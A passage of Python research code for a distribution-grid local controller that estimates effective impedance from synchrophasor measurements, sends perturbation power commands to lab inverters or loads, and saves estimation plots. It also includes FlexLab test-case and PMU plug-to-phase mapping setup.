correct\n # print(f'SETTING Zeffkestinit with Zbase ({Zbase}) calculated using network_kVAbase ({self.network_kVAbase}) received from SPBC')\n # Zeffkestinit, self.ZeffkTru = self.estimator.setZeffandZeffkestinitWnewZbase(Zbase, self.Zeffk_init_mult)\n # self.ZeffkestinitHasNotBeenInitialized = 0\n\n if self.useRefNodeforVcalc:\n # calculate relative voltage phasor\n #the correct PMUs for voltage and current (ie uPMUP123 and uPMU123) are linked in the configuration phase, so local_phasors are what you want (already)\n #values are ordered as: A,B,C according to availability, using self.plug_to_phase_map\n if self.AveragePhasorMeasurements:\n (self.Vang_with120degshifts,self.VangRef,self.Vang_without120degshifts,self.Vmag,self.VmagRef,self.Vmag_relative, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) = self.phasorV_calc(local_phasors, reference_phasors, self.nphases, self.plug_to_V_idx)\n else:\n (self.Vang_with120degshifts,self.VangRef,self.Vang_without120degshifts,self.Vmag,self.VmagRef,self.Vmag_relative, local_time_index, ref_time_index, V_ang_ref_firstPhase, dataWindowLength, Vmeas_all_phases) = self.old_phasorV_calc(local_phasors, reference_phasors, self.nphases, self.plug_to_V_idx)\n deltaVangReliable = Vmeas_all_phases\n\n # if any(np.isnan(self.Vang_without120degshifts)):\n if Vmeas_all_phases == 0:\n # print('Every phase has not received a relative phasor measurement yet, bus ' + str(self.busId))\n print(f'~~~ Didnt receive a measurement for each phase of bus {self.busId}, not running the controller this round. ~~~')\n return\n #these are used by the LQR controller\n self.Vang_with120degshifts = self.PhasorV_ang_wraparound(self.Vang_with120degshifts, self.nphases, nameVang='self.Vang_with120degshifts')\n self.Vang_without120degshifts = self.PhasorV_ang_wraparound(self.Vang_without120degshifts, self.nphases, nameVang='self.Vang_without120degshifts')\n self.VangRef = self.PhasorV_ang_wraparound(self.VangRef, self.nphases, nameVang='self.VangRef')\n self.Vmag_pu = self.Vmag / (self.localkVbase * 1000) # absolute\n self.Vmag_relative_pu = self.Vmag_relative / (self.localkVbase * 1000) #this and the VmagTarg_relative_pu line divides Vmag_ref by self.localkVbase which may create an issue bc Vref != 1.0pu, but thats okay\n self.VmagRef_pu = self.VmagRef / (self.localkVbase * 1000)\n # self.VangTarg_notRelative = self.VangTarg_relative + self.VangRef\n # self.VmagTarg_pu = self.VmagTarg_relative_pu + self.VmagRef_pu #VmagTarg is given as VmagTarg_relative_pu rn from the SPBC\n print('Vmag_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_pu))\n print('VmagRef_pu bus ' + str(self.busId) + ' : ' + str(self.VmagRef_pu))\n # print('VmagTarg_pu bus ' + str(self.busId) + ' : ' + str(self.VmagTarg_pu))\n print('Vmag_relative_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_relative_pu))\n print('Vang_without120degshifts bus ' + str(self.busId) + ' : ' + str(self.Vang_without120degshifts))\n print('VangRef bus ' + str(self.busId) + ' : ' + str(self.VangRef))\n print('Vang_with120degshifts bus ' + str(self.busId) + ' : ' + str(self.Vang_with120degshifts))\n # print('self.VangTarg_relative bus ' + str(self.busId) + ' : ' + str(self.VangTarg_relative))\n # print('self.VangTarg_notRelative bus ' + str(self.busId) + ' : ' + str(self.VangTarg_notRelative))\n #this is here so that Relative angles can be used as LQR inputs (but with a non-relative Vcomp)\n Vcomp_pu = self.Vmag_pu*np.cos(self.Vang_with120degshifts) + self.Vmag_pu*np.sin(self.Vang_with120degshifts)*1j\n Vang = self.Vang_without120degshifts\n\n # if self.currentMeasExists:\n # #here not sure why Vcomp is given\n # Zeffkest, Gt = self.estimator.ZeffUpdateWRef(self.Vmag_pu, self.Vang_with120degshifts, self.P_implemented_PU, self.Q_implemented_PU, V0magArray=self.VmagRef_pu, V0angArray=self.VangRef, sat_arrayP=self.sat_arrayP, sat_arrayQ=self.sat_arrayQ, VcompArray=Vcomp_pu, IcompArray=self.Icomp_pu) #all Vangs must be in radians\n # else:\n Zeffkest, Gt = self.estimator.ZeffUpdate(Vcomp_pu, self.P_implemented_PU, self.Q_implemented_PU, self.sat_arrayP, self.sat_arrayQ)\n # Babbrev = self.estimator.getLinWRef(Zeffkest, Vcomp_pu, self.VmagRef_pu, self.VangRef)\n # # Babbrev = self.estimator.getLinWRef(self, Zeffkest, self.Vmag_pu, self.Vang_with120degshifts, VmagRef_pu, self.VangRef)\n\n else:\n #HEREE\n Vang, self.Vmag, dataWindowLength, deltaVangReliable = self.phasorV_localMeas(local_phasors, self.nphases, self.plug_to_V_idx)\n self.Vang_with120degshifts = self.PhasorV_ang_wraparound(Vang, self.nphases, nameVang='self.Vang_with120degshifts')\n self.Vmag_pu = self.Vmag / (self.localkVbase * 1000) # absolute\n print('Vmag_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_pu))\n print('Vang_with120degshifts bus ' + str(self.busId) + ' : ' + str(self.Vang_with120degshifts))\n Vcomp_pu = self.Vmag_pu*np.cos(self.Vang_with120degshifts) + self.Vmag_pu*np.sin(self.Vang_with120degshifts)*1j\n\n # if self.currentMeasExists:\n # #here not sure why Vcomp is given\n # Zeffkest, Gt = self.estimator.ZeffUpdateWRef(self.Vmag_pu, self.Vang_with120degshifts, self.P_implemented_PU, self.Q_implemented_PU, V0magArray=self.VmagRef_pu, V0angArray=self.VangRef, sat_arrayP=self.sat_arrayP, sat_arrayQ=self.sat_arrayQ, VcompArray=Vcomp_pu, IcompArray=self.Icomp_pu) #all Vangs must be in radians\n # else:\n Zeffkest, Gt = self.estimator.ZeffUpdate(Vcomp_pu, self.P_implemented_PU, self.Q_implemented_PU, self.sat_arrayP, self.sat_arrayQ, deltaVangReliable)\n # deltaVangReliable is given to ZeffUpdate so that ZeffUpdate can update VompPrev and IcompPrev even if Zeff isnt updated\n\n # Babbrev = self.estimator.getLinWoRef(Zeffkest)\n\n # #OLD VERSION: This wouldnt work as is--see note in commented out phasorV_localMeas description\n # #also, would need to initialize self.Vang_fict in the first round\n # deltaVang_compensated, deltaVang_uncompensated, self.Vmag, dataWindowLength, Vmeas_all_phases = self.phasorV_localMeas(local_phasors, self.nphases, self.plug_to_V_idx)\n #\n # if Vmeas_all_phases == 0:\n # # print('Every phase has not received a relative phasor measurement yet, bus ' + str(self.busId))\n # print(f'~~~ Didnt receive a measurement for each phase of bus {self.busId}, not running the controller this round. ~~~')\n # return\n #\n # self.Vmag_pu = self.Vmag / (self.localkVbase * 1000)\n # #this Vcomp uses the unaltered 60 Hz synchrophasor reference\n # self.Vang_fict = self.Vang_fict + deltaVang_compensated\n # self.Vang_fict = self.PhasorV_ang_wraparound(self.Vang_fict, self.nphases, nameVang='self.Vang_fict')\n # Vcomp_fict_pu = self.Vmag_pu*np.cos(self.Vang_fict) + self.Vmag_pu*np.sin(self.Vang_fict)*1j\n # Vang = self.Vang_fict\n #\n # if self.estimatorInitialized == 0:\n # Zeffkest = self.ZeffkTru*self.Zeffk_init_mult\n # Gt = self.estimator.Gt\n # self.estimatorInitialized = 1\n # else:\n # # if self.currentMeasExists:\n # # #here not sure why Vcomp is given\n # # Zeffkest, Gt = self.estimator.ZeffUpdateWoRef(self.Vmag_pu, self.Vang_with120degshifts, self.P_implemented_PU, self.Q_implemented_PU, self.freq, self.sat_arrayP, self.sat_arrayQ, Vcomp_pu, IcompArray=self.Icomp_pu) #all Vangs must be in radians\n # # else:\n # Zeffkest, Gt = self.estimator.ZeffUpdate(Vcomp_fict_pu, self.P_implemented_PU, self.Q_implemented_PU, self.sat_arrayP, self.sat_arrayQ)\n # Babbrev = self.estimator.getLinWoRef(Zeffkest)\n # # Babbrev = self.estimator.getLinWoRef(Zeffkest, self.Vmag_pu, self.P_implemented_PU, self.Q_implemented_PU)\n\n\n\n\n # self.Pcmd_pu = np.zeros(self.nphases)\n # self.Qcmd_pu = np.zeros(self.nphases)\n # self.Pcmd_pu = (np.ones(self.nphases) + np.random.randn(self.nphases)*self.perturbScale) * self.baseP_pu\n # self.Qcmd_pu = (np.ones(self.nphases) + np.random.randn(self.nphases)*self.perturbScale) * self.baseQ_pu\n self.Pcmd_pu = (np.random.randn(self.nphases)*self.perturbScale) * self.baseP_pu\n self.Qcmd_pu = (np.random.randn(self.nphases)*self.perturbScale) * self.baseQ_pu\n # if self.perturbPowerCommand: #used to create signal for Z estimation\n # self.Pcmd_pu = self.Pcmd_pu + np.random.randn(self.nphases) * self.perturbScale\n # self.Qcmd_pu = self.Qcmd_pu + np.random.randn(self.nphases) * self.perturbScale\n\n print('Pcmd_pu bus ' + str(self.busId) + ' : ' + str(self.Pcmd_pu))\n print('Qcmd_pu bus ' + str(self.busId) + ' : ' + str(self.Qcmd_pu))\n print('localkVAbase bus ' + str(self.busId) + ' : ' + str(self.localkVAbase))\n\n print('Zeffkest bus ' + str(self.busId) + ' : ' + str(Zeffkest))\n print('ZeffkestErr bus ' + str(self.busId) + ' : ' + str(np.linalg.norm(Zeffkest-self.ZeffkTru)))\n print('GtMag ' + str(self.busId) + ' : ' + str(np.linalg.norm(Gt)))\n\n # The controller is entirely in PU. So if the pu P and Q commands are ultimately enacted on the network\n #according to the network-wide kVAbase (that was used to calculate the Zbase that was used to build the controller), then there shouldn’t be any problems.\n # The Sratio multiplication should not mess up the I estimation from S command (for Z estimation) bc the Sratio multiplication is canceled out when the Base is divided by the Sratio.\n #(Zest should use self.network_kVAbase not self.localkVAbase)\n\n # self.localkVAbase = self.network_kVAbase/self.localSratio, so this assumes that the power injections will later get multiplied by self.localSratio\n self.Pcmd_kVA = self.Pcmd_pu * self.localkVAbase #these are positive for power injections, not extractions\n self.Qcmd_kVA = self.Qcmd_pu * self.localkVAbase #localkVAbase takes into account that network_kVAbase is scaled down by localSratio (divides by localSratio)\n #localkVAbase is not a good name (bc its not the same thing as how voltage bases change throughout a network)\n #instead localkVAbase should be called flexlabAdjustedkVAbase #HHERE\n\n if self.actType == 'inverter':\n if self.currentMeasExists or self.mode == 3 or self.mode == 4 or True: #HHHERE put in the or True when I set the self.currentMeasExists to 0 manually\n '''\n COMMENTED OUT FOR CIL TESTING\n # self.commandReceipt, self.P_implemented_PU, self.Q_implemented_PU = self.httptoInverters(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA, self.Pact) #calculating Pact requires an active current measurement\n self.commandReceipt = self.httptoInverters(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA, self.Pact) #calculating Pact requires an active current measurement\n self.P_implemented_PU = self.Pcmd_pu #HERE change these if inverter commands are not always realized\n self.Q_implemented_PU = self.Qcmd_pu\n print('inverter command receipt bus ' + str(self.busId) + ' : ' + str(self.commandReceipt))\n '''\n print('********')\n # print('Vmag_relative_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_relative_pu))\n print('Vmag_pu bus ' + str(self.busId) + ' : ' + str(self.Vmag_pu))\n print('Vang bus ' + str(self.busId) + ' : ' + str(self.Vang_with120degshifts))\n print('self.phasor_error_mag_pu ' + str(self.phasor_error_mag_pu))\n print('self.phasor_error_ang ' + str(self.phasor_error_ang))\n # result, self.P_implemented_PU, self.Q_implemented_PU = self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA,self.localSratio, self.client)\n #hardcoded for CIL HERE\n result = self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA,self.localSratio, self.client)\n max_PU_power = self.ORT_max_VA/1000/self.network_kVAbase\n print('Opal command receipt bus ' + str(self.busId) + ' : ' + str(result))\n else:\n print('couldnt send commands because no current measurement available') #HERE what?\n elif self.actType == 'load':\n # self.commandReceipt, self.P_implemented_PU, self.Q_implemented_PU = self.httptoLoads(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA)\n self.commandReceipt = self.httptoLoads(self.nphases, self.act_idxs, self.Pcmd_kVA, self.Qcmd_kVA)\n # self.P_implemented_PU = self.Pcmd_pu #HERE change these if load commands are not always realized\n # self.Q_implemented_PU = self.Qcmd_pu\n print('load command receipt bus ' + str(self.busId) + ' : ' + str(self.commandReceipt))\n elif self.actType == 'modbus':\n # result, self.P_implemented_PU, self.Q_implemented_PU = self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA, self.localSratio)\n result = self.modbustoOpal(self.nphases, self.Pcmd_kVA, self.Qcmd_kVA, self.ORT_max_VA, self.localSratio)\n max_PU_power = self.ORT_max_VA/1000/self.network_kVAbase\n print('Opal command receipt bus ' + str(self.busId) + ' : ' + str(result))\n else:\n error('actType error')\n\n #Hack to get self.P_implemented_PU and self.Q_implemented_PU (assumes max_kVA is implemented correctly by self.modbustoOpal, self.httptoLoads or self.httptoInverters + self.modbustoOpal_quadrant combo)\n used_Pcmd_pu = np.zeros(self.nphases)\n used_Qcmd_pu = np.zeros(self.nphases)\n for i in np.arange(nphases):\n if self.Pcmd_pu[i] > max_PU_power[i]: # P and Q commands get compared with max_kVA indepenedently\n used_Pcmd_pu[i] = max_PU_power[i]\n elif self.Pcmd_pu[i] < -max_PU_power[i]:\n used_Pcmd_pu[i] = -max_PU_power[i]\n else:\n used_Pcmd_pu[i] = self.Pcmd_pu[i]\n if self.Qcmd_pu[i] > max_PU_power[i]: # P and Q commands get compared with max_kVA indepenedently\n used_Qcmd_pu[i] = max_PU_power[i]\n elif self.Qcmd_pu[i] < -max_PU_power[i]:\n used_Qcmd_pu[i] = -max_PU_power[i]\n else:\n used_Qcmd_pu[i] = self.Qcmd_pu[i]\n self.P_implemented_PU = used_Pcmd_pu\n self.Q_implemented_PU = used_Qcmd_pu\n print('self.P_implemented_PU ', self.P_implemented_PU)\n print('self.Q_implemented_PU ', self.Q_implemented_PU)\n #HERE self.P_implemented_PU could be self.Pact_PU, but self.Pact_PU requires a PMU current meas, so have to use an if statement to set self.P_implemented_PU with P_act\n #(could get rid of self.P_implemented_PU and just keep self.Pact_PU)\n\n self.Pact_kVA = self.Pact\n self.Qact_kVA = self.Qact\n\n #HHERE need to adjust these so that they log self.P_implemented_PU and self.Q_implemented_PU too\n log_actuation = self.save_actuation_data(self.status_phases, self.Pcmd_kVA, self.Qcmd_kVA, self.Pact_kVA, self.Qact_kVA, self.P_PV, self.batt_cmd, self.pf_ctrl)\n self.log_actuation(log_actuation)\n # print(log_actuation)\n # status = self.statusforSPBC(self.status_phases, self.phasor_error_mag_pu, self.phasor_error_ang, self.ICDI_sigP, self.ICDI_sigQ, self.Pmax_pu, self.Qmax_pu)\n # print(status)\n iterend = pytime.time()\n\n print(f'~~~ STEP FINISH - iter length: {iterend-iterstart}, epoch: {pytime.time()} ~~~')\n print('')\n if (iterend-iterstart) > rate:\n print('WARNING: LOOP LENGTH LARGER THAN RATE - INCREASE SIZE OF RATE')\n print('')\n\n #record data and save plots\n # iter = self.iteration_counter - 1\n iter = self.controlStepsTaken_counter\n # if controlStepTaken == 1:\n # if True:\n if deltaVangReliable:\n self.controlStepsTaken_counter += 1\n print('self.controlStepsTaken_counter ', self.controlStepsTaken_counter)\n if iter < self.HistLength:\n self.ZeffkErrorHist[iter] = np.linalg.norm(Zeffkest-self.ZeffkTru) #frob norm is default\n self.GtMagHist[iter] = np.linalg.norm(Gt)\n self.VmagHist[:,iter] = self.Vmag_pu\n self.VangHist[:,iter] = self.Vang_without120degshifts\n print('SAVING measurements for plotting')\n if iter == np.ceil(self.HistLength/2):\n self.Zeffkintermed = Zeffkest\n elif iter == self.HistLength:\n print('$$$$$$$$$$$$$$$$$$$$$$ SAVING plots $$$$$$$$$$$$$$$$$$$$$$')\n if self.saveVmagandangPlot or self.saveZesterrorPlot:\n current_directory = os.getcwd()\n resultsPATH = os.path.join(current_directory, 'simulationPlots')\n resultsPATH = os.path.join(resultsPATH, f'feeder:{self.testcase}_bus:{self.busId}') #if you want to write over previous run\n # resultsPATH = os.path.join(resultsPATH, f'feeder:{self.testcase}_bus:{self.busId}_time:{pytime.time()}') #if you want to save each run\n if not os.path.exists(resultsPATH):\n os.makedirs(resultsPATH)\n\n if self.saveVmagandangPlot:\n #magnitude\n for phase in np.arange(self.estimator.nphases):\n plt.plot(self.VmagHist[phase,:], label='node: ' + self.busId + ', ph: ' + str(phase))\n # print('phase ', phase)\n # plt.title('Network: 13 node feeder with constant load')\n plt.ylabel('p.u. Vmag')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, 'Vmag')); plt.clf(); plt.cla(); plt.close()\n\n #angle\n for phase in np.arange(self.estimator.nphases):\n Vangs = self.VangHist[phase,:]\n plt.plot(Vangs, label='node: ' + self.busId + ', ph: ' + str(phase))\n # plt.title('Network: 13 node feeder with constant load')\n plt.ylabel('Vang [rad]')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, 'Vang')); plt.clf(); plt.cla(); plt.close()\n print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n print('SAVED Vmag and Vang plots ')\n\n if self.saveZesterrorPlot:\n print('<<<<<<<<<<<<<<<<<<<<<<<<<<,')\n print('self.initErrString ', self.initErrString)\n print(f'Zeffk_true (PU) bus {self.busId}: ', self.ZeffkTru)\n print(f'Zeffk_init (PU) bus {self.busId}: ', self.Zeff_kinit)\n print(f'Zeffk_intermed (PU) bus {self.busId}: ', self.Zeffkintermed)\n print(f'Zeffk_est (PU) bus {self.busId}: ', Zeffkest)\n Zeststack = np.vstack((self.Zeff_kinit, self.Zeffkintermed, Zeffkest))\n Zest_df = pd.DataFrame(Zeststack)\n Zest_df.to_csv(os.path.join(resultsPATH, f'Zestimates_{self.initErrString}.csv'))\n\n plt.plot(self.ZeffkErrorHist,'-', label='node: ' + self.busId)\n # plt.title('Zeff Estimation Error')\n plt.ylabel('Frobenius Norm Zeff Estimation Error')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, f'ZestError_{self.initErrString}.png')); plt.clf(); plt.cla(); plt.close()\n\n plt.plot(self.GtMagHist,'-', label='node: ' + self.busId)\n plt.ylabel('Frobenius Norm of Gt')\n plt.xlabel('Timestep')\n plt.legend()\n plt.savefig(os.path.join(resultsPATH, f'Gt_{self.initErrString}.png')); plt.clf(); plt.cla(); plt.close()\n\n stack = np.vstack((self.ZeffkErrorHist,self.GtMagHist))\n if self.saveVmagandangPlot:\n for phase in np.arange(self.estimator.nphases):\n stack = np.vstack((stack,self.VmagHist[phase,:]))\n if self.estimator.nphases == 3:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt', 'Va Magnitude', 'Vb Magnitude', 'Vc Magnitude'])\n elif self.estimator.nphases == 2:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt', 'Va Magnitude', 'Vb Magnitude'])\n else:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt', 'Va Magnitude'])\n # this assumes the phases are a then b then c, which isnt necessarily true\n else:\n Zerr_df = pd.DataFrame(stack.T, columns=['Zth Estimation Error', 'Gt'])\n Zerr_df.to_csv(os.path.join(resultsPATH, f'ZestData_{self.initErrString}.csv'))\n print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n print('SAVED Zest plots ')\n\n # if self.loop != 'None':\n # self.loop.stop() #this should stop the xbosprocess\n # self.loop.stop()\n # self.loop.close()\n # print('running sys.exit(0)')\n # sys.exit(0)\n print('running os._exit(0)')\n os._exit(0)\n return #status\n\n\n'''\nNetwork phase, actuator, and pmu plug mapping explanation:\n\nTLDR:\nActuator assignments are determined by acts_to_phase_dict[key] for each simulation.\nThe entry in acts_to_phase_dict[key] (ie 0, 1 or 2) determines which actuator is controlled.\nThe phase entry determines which phase, and must (should) coincide with the phases of that node on the simulated network.\nPhases must be in order (becasue I havent implemented a phase to idx mapping yet).\nThe PMU port to actuator mapping is set once for the Flexlab, and applies to all simulations.\nThe PMU port to actuator mapping is used with the given simulations act to phase mapping to create a port to phase mapping for that simulation (automatically).\nThat port to phase mapping is sent to LPBC, and is used to order the PMU measurements according to their true phase.\n\nAssumptions:\n-Actuators are dispatched in A,B,C order (to ditch this assumption, we would need a phase_to_act map, that might have to come later anyway)\n-voltage and current ports of the PMU are attached in the same order\n-PMU123 and PMU123P are connected in the same order (because in real applications you will not have a PMU123P)\n\n\nLonger Explanation:\nWant LPBCwrapper to have minimal changes necessary for implementing it outside of FLexlab.\nIn practice, LPBC is attached to nphases actuators, and has nphases measurements.\nLPBC needs to know which phase is which to compare local phasor meas w ref phasor meas (It is assumed that reference phasors come in A,B,C order), and also so the LPBC can maintain phase-specific commands from the SPBC.\nSo the LPBC needs the channel to phase mapping.\nIn practice, the LPBC measurements may not go through the WAVE comms network, and the mapping would be plug to phase.\nFor the Flexlab testing, we assume the plugs to channels are a 1-to-1 mapping\n\nIn the Flexlab, there might be a mismatch between the PMU plugs (wave channels) and the actuators.\nWhat we really want is a mapping bn the PMU plugs (wave channels) and the correct phases.\nThe plug to act mapping has to be determined for the flexlab, but doesnt change.\nEach simulation gives the act to phase mapping.\nUsing both these mappings, we build the plug to phase mapping.\nAlso, the necessary pmu plugs are put on the network, in the cannonical order (L1,L2,L3 etc)\n\nTo preserve the minimal-change-necessary paradigm, it is assumed that PMU123 ang PMU123P are connected the same way,\nas well was the voltage and current ports for each PMU.\n\nnon-Flexlab-specific dictionaries:\n\nplug_to_phase_dict:\nnot Flexlab-specific dictionary (generally useful).\nCreates a dictionary which is keyed by the bus ID, and the entry is a nplugs-long list\nwhich maps the PMU plugs eg. [L1, L2, L3] to ['A','B','C'] or [L1] to ['B']\n\nFlexlab-specific dictionaries:\n\nacts_to_phase_dict:\nMaps the actuators in the flexlab to phases on the network\nIf some phases are not connected, the empty string '' is placed in the location.\n\nTo account for the fact that the PMU plugs and actuators may be misconnected (a flexlab-specific issue),\nThis code deals with this by using the empty strings '' in acts_to_phase_dict.\nIf an entry is not empty, then the controller controls that actuator.\nThe corresponding pmu reading for that actuator is given using the act_to_plug_Map\n\nact_idxs:\nDetermines which flexlab actuators a given LPBC controls.\nassumes that, for each lpbc with multiple actuators, the actuators are dispatched in A, B, C order\nalso, for each lpbc, there is not more than one actuator on a given phase\n\nactType_dict:\nTells each LPBC whether it sends commands to loads or inverters\n\n'''\n\n\nSPBCname = 'spbc-jasper-1'\n# SPBCname = 'spbc-example-jasper'\n\n#Manual entry here to determine test case, phases, etc.\n#Test Case\n#testcase = '13unb'\ntestcase = '13bal'\n# testcase = '33'\n# testcase = 'PL0001'\n# testcase = 'manual'\n\nacts_to_phase_dict = dict()\nactType_dict = dict()\nif testcase == '13bal':\n testNumber = '3.3'\n lpbcidx = ['675'] #may have to set these manually\n for key in lpbcidx: #makes them all three phase inverters\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #3 phase default #['A','',''] or ['','C',''] or ['A','B','C','A','B','C'] or ['A','','','A','',''] are also examples, ['A','C','B'] and ['B','B','B'] are not allowed (yet)\n actType_dict[key] = 'inverter' #'inverter' or 'load'\n ORT_max_kVA = 500\n VmagScaling = 1\n inverterScaling = 500/3.3\n loadScaling = 350\n CILscaling = 10 #in VA\n kVbase = np.ones(3)*(4.16/np.sqrt(3))\n kVAbase = np.ones(3)*5000/3\nelif testcase == '13unb':\n # lpbcidx = ['671','680']\n # key = '671'\n # acts_to_phase_dict[key] = np.asarray(['A','B','C']) #phase on the network (in simulation)\n # actType_dict[key] = 'inverter'\n # key = '680'\n # acts_to_phase_dict[key] = np.asarray(['','','C']) #HERE Single phase actuation might cause problems #the nonzero entries correspond to the actuator indices\n # actType_dict[key] = 'load'\n testNumber = '8.1'\n lpbcidx = ['632'] #nodes of actuation\n key = '632'\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #which phases to actuate for each lpbcidx # INPUT PHASES\n actType_dict[key] = 'inverter' #choose: 'inverter', 'load', or 'modbus'\n ORT_max_kVA = 500\n VmagScaling = 1\n inverterScaling = 500/3.3\n loadScaling = 350\n CILscaling = 10 #in VA\n kVbase = np.ones(3)*(4.16/np.sqrt(3))\n kVAbase = np.ones(3)*5000/3\nelif testcase == '33':\n testNumber = '8.1'\n lpbcidx = ['6'] #for 33\n key = '6'\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #which phases to actuate for each lpbcidx # INPUT PHASES\n actType_dict[key] = 'inverter' #choose: 'inverter', 'load', or 'modbus'\n ORT_max_kVA = 500\n VmagScaling = 3. #this is a hack to get flexlab to work\n inverterScaling = 500/3.3\n loadScaling = 350\n CILscaling = 10 #in VA\n kVbase = np.ones(3)*(12.47/np.sqrt(3))\n kVAbase = np.ones(3)*3000/3\nelif testcase == 'PL0001':\n testNumber = '9.3'\n lpbcidx = ['N_300063911']\n key = 'N_300063911'\n acts_to_phase_dict[key] = np.asarray(['A','B','C']) #which phases to actuate for each lpbcidx # INPUT PHASES\n actType_dict[key] = 'inverter' #choose: 'inverter', 'load', or 'modbus'\n ORT_max_kVA = 1000\n VmagScaling = 12.6/4.16\n inverterScaling = 1000/1\n loadScaling = 350\n CILscaling = 20 #in VA\n kVbase = np.ones(3)*(12.6/np.sqrt(3))\n kVAbase = np.ones(3)*1500/3\nelif testcase == 'manual':\n print('MOVED TESTS TO ACTUAL TEST CASES')\n\n#these should be established once for the FLexlab,\n#they take care of cases where a pmu port does not correspond to the given inverter number\n#eg if pmu123 port 2 is attached to inverter 3 and port 3 is attached to inverter 2 pmu123_act_to_plug_Map = np.asarray([0, 2, 1])\npmu0_phase_to_plug_Map = np.asarray([0, 1, 2]) #this is assumed to be true\npmu123_act_to_plug_Map = np.asarray([0, 1, 2])\n# pmu123P_act_to_plug_Map = np.asarray([0, 1, 2]) #this is assumed to be in the same order as pmu123_act_to_plug_Map\npmu4_act_to_plug_Map = np.asarray([0, 1, 2])\npmu0_plugs_dict = dict()\npmu123_plugs_dict = dict()\npmu123P_plugs_dict = dict()\npmu4_plugs_dict = dict()\n\nplug_to_phase_dict = dict()\n\nfor key in lpbcidx:\n #act_idxs assumes that, for each lpbc with multiple actuators, the actuators are dispatched in A, B, C order\n #also, for each lpbc, there is not more than one actuator on a given phase\n act_idxs = np.nonzero(acts_to_phase_dict[key])[0] #nonzero entries of acts_to_phase_dict[key] are defined as turning on actuators 1, 2, 3, [0] bc np.nonzero() is weird\n nphases = len(act_idxs)\n\n #In case referenec plugs are not in the connected in the correct A,B,C order:\n #Puts pmu0_plugs_dict[key] in A, B, C order, (assuming XBOS wrapper doesnt take care of this on its own)\n #acts_to_phase_dict[key] has the phases that the reference should listen to (not necessarily in order)\n pmu0_plugs_dict[key] = []\n if 'A' in acts_to_phase_dict[key]: #HERE if you wanted to always include the ref meas for phase A you would take out this if statement. Would also require changing the logic in phasorV_calc and phasorI_calc.\n pmu0_plugs_dict[key].append(pmu0_phase_to_plug_Map[0]) #if ref needs to listen to A, listen to the PMU plug corresponding to A\n if 'B' in acts_to_phase_dict[key]:\n pmu0_plugs_dict[key].append(pmu0_phase_to_plug_Map[1])\n if 'C' in acts_to_phase_dict[key]:\n pmu0_plugs_dict[key].append(pmu0_phase_to_plug_Map[2])\n pmu0_plugs_dict[key] = np.asarray(pmu0_plugs_dict[key])\n\n #Does not put local pmus measurements in A, B, C order, but does build plug_to_phase_Map\n #assumes PMU123 and PMU123P are connected in the same order (because in real applications you will not have a PMU123P)\n plug_to_phase_dict[key] = np.asarray(['','',''])\n if actType_dict[key] == 'inverter':\n #puts the the correct PMU measurements into pmu123_plugs_dict[key] and pmu123P_plugs_dict[key] in the order in which the actuators appear in acts_to_phase_dict[key]\n pmu123_plugs_dict[key] = []\n pmu123P_plugs_dict[key] = []\n for i in np.arange(3): #actuator i\n if acts_to_phase_dict[key][i] != '': #if this LPBC uses actuator i\n plug = pmu123_act_to_plug_Map[i] #the pmu plug that corresponds to actuator i\n phase = acts_to_phase_dict[key][i]\n plug_to_phase_dict[key][plug] = phase #places the phase for that wave channel in the plug_to_phase mapping that gets sent to the PMUs\n pmu123_plugs_dict[key].append(plug) #places the PMU measurement corresponding to actuator i on the WAVE channel\n pmu123P_plugs_dict[key].append(plug)\n pmu123_plugs_dict[key] = np.asarray(sorted(pmu123_plugs_dict[key])) #orders the PMU channels in 0,1,2 ordering. This is expected by plug_to_phase_dict, which is sorted implicitly when it is built by inserting into [plug] position (then subsequently reduced to an idx)\n pmu123P_plugs_dict[key] = np.asarray(sorted(pmu123P_plugs_dict[key]))\n elif actType_dict[key] == 'load':\n pmu4_plugs_dict[key] = []\n for i in np.arange(3): #actuator i\n if acts_to_phase_dict[key][i] != '': #if this LPBC uses actuator i\n plug = pmu4_act_to_plug_Map[i] #the pmu plug that corresponds to actuator i\n phase = acts_to_phase_dict[key][i]\n plug_to_phase_dict[key][plug] = phase #places the phase for that wave channel in the plug_to_phase mapping that gets sent to the PMUs\n pmu4_plugs_dict[key].append(plug) #places the PMU measurement corresponding to actuator i on the WAVE channe\n pmu4_plugs_dict[key] = np.asarray(sorted(pmu4_plugs_dict[key])) #orders the PMU channels in 0,1,2 ordering. This is expected by plug_to_phase_dict, which is sorted implicitly\n elif actType_dict[key] == 'modbus':\n pmu123P_plugs_dict[key] = []\n for i in np.arange(3): #actuator i\n if acts_to_phase_dict[key][i] != '': #if this LPBC uses actuator i\n plug = pmu123_act_to_plug_Map[i] #the pmu plug that corresponds to actuator i\n phase = acts_to_phase_dict[key][i]\n plug_to_phase_dict[key][plug] = phase #places the phase for that wave channel in the plug_to_phase mapping that gets sent to the PMUs\n pmu123P_plugs_dict[key].append(plug)\n pmu123P_plugs_dict[key] = np.asarray(sorted(pmu123P_plugs_dict[key]))\n#entity corresponds to a given piece of hardware (eg a server), putting 